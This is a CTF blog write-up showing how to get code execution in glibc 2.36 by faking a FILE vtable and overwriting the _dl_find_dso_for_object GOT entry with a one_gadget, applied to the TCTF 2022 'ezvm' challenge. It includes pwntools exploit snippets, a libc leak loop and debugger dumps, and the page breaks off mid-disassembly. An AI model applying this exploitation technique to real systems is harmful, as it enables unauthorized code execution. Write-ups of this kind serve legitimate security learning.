<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]   Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]  invalid vtable TCTF 2022 ezvm Conclusion     In the first part, I sho">
<meta property="og:type" content="article">
<meta property="og:title" content="Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]">
<meta property="og:url" content="https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/index.html">
<meta property="og:site_name">
<meta property="og:description" content="Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]   Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]  invalid vtable TCTF 2022 ezvm Conclusion     In the first part, I sho">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-09-30T19:44:16.000Z">
<meta property="article:modified_time" content="2022-10-03T09:56:17.790Z">
<meta property="article:author" content="Xia0o0o0o">
<meta property="article:tag" content="Vulnerability">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="../../../../https:/avatars.githubusercontent.com/u/22996989?s=400&amp;u=18dec832f23e8e1d9f7097245cd5b955990979b8&amp;v=4">
        
      
      
        
          <link rel="icon" type="image/png" href="../../../../https:/avatars.githubusercontent.com/u/22996989?s=400&amp;u=18dec832f23e8e1d9f7097245cd5b955990979b8&amp;v=4" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="../../../../https:/avatars.githubusercontent.com/u/22996989?s=400&amp;u=18dec832f23e8e1d9f7097245cd5b955990979b8&amp;v=4">
        
      
    
    <!-- title -->
    <title>Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="../../../../css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="atom.xml" title="" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
      <!--
           -->
        <li>
          <span style="display: flex; align-items: center;">
            <title>
              Home
            </title>
            <svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.5 6.56062L8.00001 2.06062L3.50001 6.56062V13.5L6.00001 13.5V11C6.00001 9.89539 6.89544 8.99996 8.00001 8.99996C9.10458 8.99996 10 9.89539 10 11V13.5L12.5 13.5V6.56062ZM13.78 5.71933L8.70711 0.646409C8.31659 0.255886 7.68342 0.255883 7.2929 0.646409L2.21987 5.71944C2.21974 5.71957 2.21961 5.7197 2.21949 5.71982L0.469676 7.46963L-0.0606537 7.99996L1.00001 9.06062L1.53034 8.53029L2.00001 8.06062V14.25V15H2.75001L6.00001 15H7.50001H8.50001H10L13.25 15H14V14.25V8.06062L14.4697 8.53029L15 9.06062L16.0607 7.99996L15.5303 7.46963L13.7806 5.71993C13.7804 5.71973 13.7802 5.71953 13.78 5.71933ZM8.50001 11V13.5H7.50001V11C7.50001 10.7238 7.72386 10.5 8.00001 10.5C8.27615 10.5 8.50001 10.7238 8.50001 11Z" fill="currentColor"></path></svg>
              <a style="padding-left: 9px;" href="../../../../index.html">
                Home
              </a>
          </span>
        </li>
        <!--
           -->
        <li>
          <span style="display: flex; align-items: center;">
            <title>
              Writing
            </title>
            <svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path clip-rule="evenodd" d="M4.25 0C3.00736 0 2 1.00736 2 2.25V11V11.25V11.5C2 12.5252 2.61705 13.4062 3.5 13.792V11.5V11.25V11C3.5 10.4477 3.94772 10 4.5 10H12.5V11.2305V12.5H10.5V14H12.5H14V12.5V11.2305V10V8.5V0.75V0H13.25H4.25ZM12.5 8.5V1.5H4.25C3.83579 1.5 3.5 1.83579 3.5 2.25V8.70802C3.80623 8.57422 4.14445 8.5 4.5 8.5H12.5ZM5.5 11.5C5.22386 11.5 5 11.7239 5 12V16L7 14.75L9 16V12C9 11.7239 8.77614 11.5 8.5 11.5H5.5Z" fill="currentColor" fill-rule="evenodd"></path></svg>
              <a style="padding-left: 9px;" href="../../../../archives/">
                Writing
              </a>
          </span>
        </li>
        <!--
           -->
        <li>
          <span style="display: flex; align-items: center;">
            <title>
              Projects
            </title>
            <svg data-testid="geist-icon" height="16" stroke-linejoin="round" viewBox="0 0 16 16" width="16" style="color: currentcolor;"><path fill-rule="evenodd" clip-rule="evenodd" d="M1.80808 4.44191L2.25003 4.88386L3.13391 3.99997L2.69196 3.55803L1.63391 2.49997L2.69197 1.44191L3.13391 0.999972L2.25003 0.116089L1.80808 0.558031L0.484858 1.88126C0.143149 2.22296 0.143149 2.77698 0.484859 3.11869L1.80808 4.44191ZM12 0.999972H11.25V2.49997H12H13.5V11.75C13.5 12.7165 12.7165 13.5 11.75 13.5H4.25002C3.28353 13.5 2.50003 12.7165 2.50003 11.75V6.99997V6.24997H1.00003V6.99997V11.75C1.00003 13.5449 2.4551 15 4.25002 15H11.75C13.545 15 15 13.5449 15 11.75V1.74997V0.999972H14.25H12ZM7.75003 4.88386L8.19197 4.44191L9.51519 3.11869C9.8569 2.77698 9.8569 2.22296 9.51519 1.88126L8.19196 0.55803L7.75002 0.116089L6.86614 0.999973L7.30808 1.44191L8.36614 2.49997L7.30809 3.55803L6.86615 3.99997L7.75003 4.88386ZM4.13155 3.89688L4.02847 4.51535L5.26541 4.7215L5.36848 4.10303L5.86848 1.10303L5.97156 0.484566L4.73462 0.278409L4.63155 0.896878L4.13155 3.89688Z" fill="currentColor"></path></svg>
              <a style="padding-left: 9px;" href="../../../../https:/github.com/KpwnZ">
                Projects
              </a>
          </span>
        </li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="../../../10/03/Analyze-CVE-2022-32792-Faster-Than-Light-but-at-What-Cost/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="../../26/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x0/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&text=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&is_video=false&description=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]&body=Check out this article: https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&title=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&name=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kpwnz.github.io/2022/09/30/Code-Execution-by-Hijacking-IO-FILE-vtable-in-GLIBC-2-36-0x1/&t=Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#invalid-vtable"><span class="toc-number">1.1.</span> <span class="toc-text">invalid vtable</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCTF-2022-ezvm"><span class="toc-number">1.2.</span> <span class="toc-text">TCTF 2022 ezvm</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.3.</span> <span class="toc-text">Conclusion</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Xia0o0o0o</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-09-30T19:44:16.000Z" class="dt-published" itemprop="datePublished">2022-09-30</time>
        
      
    </div>


      

      
    <div class="article-tag" style="text-decoration: none;">
        <i class="fa-solid fa-tag"></i>
        <a class="tag-category" href="../../../../tags/CTF/" rel="tag">CTF</a> <a class="tag-category" href="../../../../tags/PWN/" rel="tag">PWN</a> <a class="tag-category" href="../../../../tags/Vulnerability/" rel="tag">Vulnerability</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1>Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]</h1>
<!-- TOC -->
<ul>
<li><a href="#code-execution-by-faking-io_file-vtable-in-glibc-236-0x1">Code Execution by Faking IO_FILE-&gt;vtable in GLIBC 2.36 [0x1]</a>
<ul>
<li><a href="#invalid-vtable">invalid vtable</a></li>
<li><a href="#tctf-2022-ezvm">TCTF 2022 ezvm</a></li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
</li>
</ul>
<!-- /TOC -->
<p>In the first part, I showed a new method to completely control the <code>vtable</code> of <code>IO_FILE</code>. In this chapter I would like to present a much more stable way to gain arbitrary code execution and use this way to solve a CTF challenge.</p>
<h2 id="invalid-vtable">invalid <code>vtable</code></h2>
<p>In first chapter we focus on bypassing the checking in <code>_IO_vtable_check</code>.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> attribute_hidden</span><br><span class="line">_IO_vtable_check (<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> SHARED</span></span><br><span class="line">  <span class="comment">/* Honor the compatibility flag.  */</span></span><br><span class="line">  <span class="keyword">void</span> (*flag) (<span class="keyword">void</span>) = atomic_load_relaxed (&amp;IO_accept_foreign_vtables);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> PTR_DEMANGLE</span></span><br><span class="line">  PTR_DEMANGLE (flag);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">  <span class="keyword">if</span> (flag == &amp;_IO_vtable_check)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* In case this libc copy is in a non-default namespace, we always</span></span><br><span class="line"><span class="comment">     need to accept foreign vtables because there is always a</span></span><br><span class="line"><span class="comment">     possibility that FILE * objects are passed across the linking</span></span><br><span class="line"><span class="comment">     boundary.  */</span></span><br><span class="line">  &#123;</span><br><span class="line">    Dl_info di;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l</span>;</span></span><br><span class="line">    <span class="keyword">if</span> (!rtld_active ()</span><br><span class="line">        || (_dl_addr (_IO_vtable_check, &amp;di, &amp;l, <span class="literal">NULL</span>) != <span class="number">0</span></span><br><span class="line">            &amp;&amp; l-&gt;l_ns != LM_ID_BASE))</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span> <span class="comment">/* !SHARED */</span></span></span><br><span class="line">  <span class="comment">/* We cannot perform vtable validation in the static dlopen case</span></span><br><span class="line"><span class="comment">     because FILE * handles might be passed back and forth across the</span></span><br><span class="line"><span class="comment">     boundary.  Therefore, we disable checking in this case.  */</span></span><br><span class="line">  <span class="keyword">if</span> (__dlopen != <span class="literal">NULL</span>)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  __libc_fatal (<span class="string">&quot;Fatal error: glibc detected an invalid stdio handle\n&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>When <code>flag != &amp;_IO_IO_vtable_check</code> and <code>rtld_active() != 0</code>, it will finally invoke <code>_dl_addr()</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">int</span></span><br><span class="line">_dl_addr (<span class="keyword">const</span> <span class="keyword">void</span> *address, Dl_info *info,</span><br><span class="line">	  struct link_map **mapp, <span class="keyword">const</span> ElfW(Sym) **symbolp)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Addr)</span> addr </span>= DL_LOOKUP_ADDRESS (address);</span><br><span class="line">  <span class="keyword">int</span> result = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Protect against concurrent loads and unloads.  */</span></span><br><span class="line">  __rtld_lock_lock_recursive (GL(dl_load_lock));</span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l</span> =</span> _dl_find_dso_for_object (addr);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (l)</span><br><span class="line">    &#123;</span><br><span class="line">      determine_info (addr, l, info, mapp, symbolp);</span><br><span class="line">      result = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  __rtld_lock_unlock_recursive (GL(dl_load_lock));</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Notice that it will call <code>_dl_find_dso_for_object()</code>. From the assembly code we can find that the address of this function is in <code>ld</code> and it is dynamically resolved which means if we are able to override the <code>.GOT</code> table of it we can jump to anywhere we want! And yes, we don’t need to bruteforce <code>ld</code>’s address with this method.</p>
<h2 id="TCTF-2022-ezvm">TCTF 2022 ezvm</h2>
<p>Here I will demonstrate how to use this arbitrary code execution method to solve this CTF challenge. I will focus on code execution part since there are plenty of writeups with different ways of heap grooming and libc leaking I will only briefly cover these parts.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">p.sendlineafter(<span class="string">b&#x27;Welcome&#x27;</span>, <span class="string">b&#x27;aaa&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;code size:&#x27;</span>, <span class="string">b&#x27;100&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;memory count&#x27;</span>, tob(<span class="number">0x100</span>))</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;code:\n&#x27;</span>, p8(<span class="number">0x17</span>))</span><br></pre></td></tr></table></figure>
<p>with a simple heap grooming we can have a libc address at <code>memory[0]</code>, then we leak the address bit by bit.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">leak = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">64</span>):</span><br><span class="line">    code =  read_mem(<span class="number">0</span>, <span class="number">0</span>)      <span class="comment"># load memory[0] to register[0]</span></span><br><span class="line">    code += push(<span class="number">0</span>)             <span class="comment"># push register[0]</span></span><br><span class="line">    code += read_imm(<span class="number">1</span>, <span class="number">1</span>&lt;&lt;i)   <span class="comment"># load mask to register[0]</span></span><br><span class="line">    code += push(<span class="number">1</span>)             <span class="comment"># push register[0]</span></span><br><span class="line">    code += stk_and             <span class="comment"># logical and stack[top] stack[top-1] and push the result</span></span><br><span class="line">    code += jmp(<span class="number">1</span>)              <span class="comment"># jump to illegal if 1</span></span><br><span class="line">    code += p8(<span class="number">0xff</span>)+p8(<span class="number">0x17</span>)   <span class="comment"># 0xff(illegal) and exit 0x17</span></span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;code size:\n&#x27;</span>, tob(<span class="built_in">len</span>(code)))</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;memory count:&#x27;</span>, tob(<span class="number">0x100</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;code:&#x27;</span>, code)</span><br><span class="line">    recv_data = p.recvuntil(<span class="string">b&#x27;finish&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b&#x27;what&#x27;</span> <span class="keyword">in</span> recv_data:    <span class="comment"># illegal instruction</span></span><br><span class="line">        leak |= (<span class="number">1</span>&lt;&lt;i)</span><br><span class="line">        log.info(<span class="string">&quot;leak data: &quot;</span>+<span class="built_in">hex</span>(leak))</span><br></pre></td></tr></table></figure>
<p>Now we have libc address, so that we are able to calculate one gadget from it. Then using the OOB bug and allocate using <code>mmap</code> by setting a size that is big enough.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># allocate memory with mmap, and exploit the OOB bug</span></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;code size:&#x27;</span>, <span class="string">b&#x27;500&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;memory count&#x27;</span>, tob(<span class="number">0x6000000000200000</span>)) </span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;writing to stderr&#x27;</span>)</span><br><span class="line">code =  read_imm(<span class="number">0</span>, libc.address+<span class="number">0xebcf8</span>)     <span class="comment"># one_gadget</span></span><br><span class="line">code += store_mem(<span class="number">0</span>, <span class="number">0x24340f</span>*<span class="number">8</span>)              <span class="comment"># offset of GOT</span></span><br><span class="line">code += read_imm(<span class="number">0</span>, <span class="number">0x41414141</span>)               <span class="comment"># vtable, any value not in vtable segment</span></span><br><span class="line">code += store_mem(<span class="number">0</span>, <span class="number">0x121b768</span>)               <span class="comment"># write to stderr-&gt;vtable</span></span><br><span class="line">code += read_imm(<span class="number">0</span>, <span class="number">0x1122334455667788</span>)       <span class="comment"># anything</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">0x15</span>):                      <span class="comment"># override fields in stderr</span></span><br><span class="line">    code += store_mem(<span class="number">0</span>, <span class="number">0x121b698</span>+i*<span class="number">8</span>)</span><br><span class="line">code += read_imm(<span class="number">0</span>, <span class="number">0</span>)  </span><br><span class="line">code += store_mem(<span class="number">0</span>, <span class="number">0x121b690</span>)               <span class="comment"># stderr-&gt;flag</span></span><br><span class="line">code += read_imm(<span class="number">0</span>, <span class="number">0xaabbccdd55667788</span>)       <span class="comment"># stderr-&gt;write_ptr</span></span><br><span class="line">code += store_mem(<span class="number">0</span>, <span class="number">0x121b6b8</span>)               <span class="comment"># write to stderr-&gt;write_ptr</span></span><br></pre></td></tr></table></figure>
<p>after that we can notice the <code>vtable</code> is already overrided by <code>AAAA</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x/32xg &amp;_IO_2_1_stderr_</span><br><span class="line">0x7fd1d021a6a0 &lt;_IO_2_1_stderr_&gt;:       0x0000000000000000      0x1122334455667788          </span><br><span class="line">0x7fd1d021a6b0 &lt;_IO_2_1_stderr_+16&gt;:    0x1122334455667788      0x1122334455667788          </span><br><span class="line">0x7fd1d021a6c0 &lt;_IO_2_1_stderr_+32&gt;:    0x1122334455667788      0xaabbccdd55667788          </span><br><span class="line">0x7fd1d021a6d0 &lt;_IO_2_1_stderr_+48&gt;:    0x1122334455667788      0x1122334455667788          </span><br><span class="line">0x7fd1d021a6e0 &lt;_IO_2_1_stderr_+64&gt;:    0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a6f0 &lt;_IO_2_1_stderr_+80&gt;:    0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a700 &lt;_IO_2_1_stderr_+96&gt;:    0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a710 &lt;_IO_2_1_stderr_+112&gt;:   0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a720 &lt;_IO_2_1_stderr_+128&gt;:   0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a730 &lt;_IO_2_1_stderr_+144&gt;:   0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a740 &lt;_IO_2_1_stderr_+160&gt;:   0x1122334455667788      0x1122334455667788</span><br><span class="line">0x7fd1d021a750 &lt;_IO_2_1_stderr_+176&gt;:   0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7fd1d021a760 &lt;_IO_2_1_stderr_+192&gt;:   0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7fd1d021a770 &lt;_IO_2_1_stderr_+208&gt;:   0x0000000000000000      0x0000000041414141  &lt;- any address here</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>and now the <code>.GOT</code> table of <code>_dl_find_dso_for_object</code> is our one gadget</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x7f3dbf819088 &lt;_dl_find_dso_for_object@got.plt&gt;:       0x00007f3dbf6ebcf8     0x00007f3dbf7b3430</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x/16i 0x00007f3dbf6ebcf8</span><br><span class="line">   0x7f3dbf6ebcf8 &lt;execvpe+1144&gt;:       lea    rdi,[rip+0xec999]        # 0x7f3dbf7d8698                                                                        </span><br><span class="line">   0x7f3dbf6ebcff &lt;execvpe+1151&gt;:       mov    QWORD PTR [rbp-0x78],r9</span><br><span class="line">   0x7f3dbf6ebd03 &lt;execvpe+1155&gt;:       call   0x7f3dbf6eb0f0 &lt;execve&gt;</span><br><span class="line">   0x7f3dbf6ebd08 